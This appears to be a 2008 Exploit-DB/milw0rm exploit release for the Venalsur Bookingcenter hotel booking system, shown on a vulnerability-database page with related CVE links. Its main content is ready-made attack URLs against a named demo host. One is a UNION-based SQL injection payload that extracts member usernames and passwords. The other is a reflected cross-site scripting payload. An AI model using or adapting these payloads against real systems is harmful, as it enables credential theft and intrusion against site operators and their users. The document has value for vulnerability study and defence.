Lucene search
D3b4gEDB-ID:6876HistoryOct 29, 2008 - 12:00 a.m.
Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection
2008-10-2900:00:00
d3b4g
www.exploit-db.com
50
AI Score
7.4
Confidence
Low
Booking System for Hotels Group powered by Venalsur Bookingcenter XSS/SQL injetion vulnerability!
------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
Author: d3b4g
Greetz: str0ke,,Darkc0de.com,rez0rn,draconyx,godinlaw,hatebreeder And all my friends
Site : www.bl4ck3nd.info
Contact: bl4ckend[at]gmail[dot]com
-------------------------------------------------------------------
-------------------------------------------------------------------
Dork: N/A
-------------------------------------------------------------------
Affected software:
-----------------
Application : Booking System for Hotels Group powered by Venalsur Bookingcenter
URL : http://www.bookingcentre.eu
===================================================================
Sql injection
=============
Exploit: http://site.com/www_en/cadena_ofertas_ext.php?OfertaID= [sql]
Demo : http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=-1+union+all+select+1,2,3,concat(username,password),5,6,7,8,9,10,11+from+members/*
------------------------------------------------------------------------
Xss
===
Exploit:http://demo.hotelsadmin.com/www_en/cadena_ofertas_ext.php?OfertaID=<script>alert(40323.6285846991)</script>
=========================================================================
Proud to be a maldivian :):) Happy new maldives [29.10.2008]
# milw0rm.com [2008-10-29]Related
cvelist
cvelist
CVE-2008-6216
2009-02-20 17:00:00
CVE-2008-6215
2009-02-20 17:00:00
cve
cve
CVE-2008-6215
2009-02-20 17:30:03
CVE-2008-6216
2009-02-20 17:30:03
prion
prion
Sql injection
2009-02-20 17:30:00
Cross site scripting
2009-02-20 17:30:00
nvd
nvd
CVE-2008-6216
2009-02-20 17:30:03
CVE-2008-6215
2009-02-20 17:30:03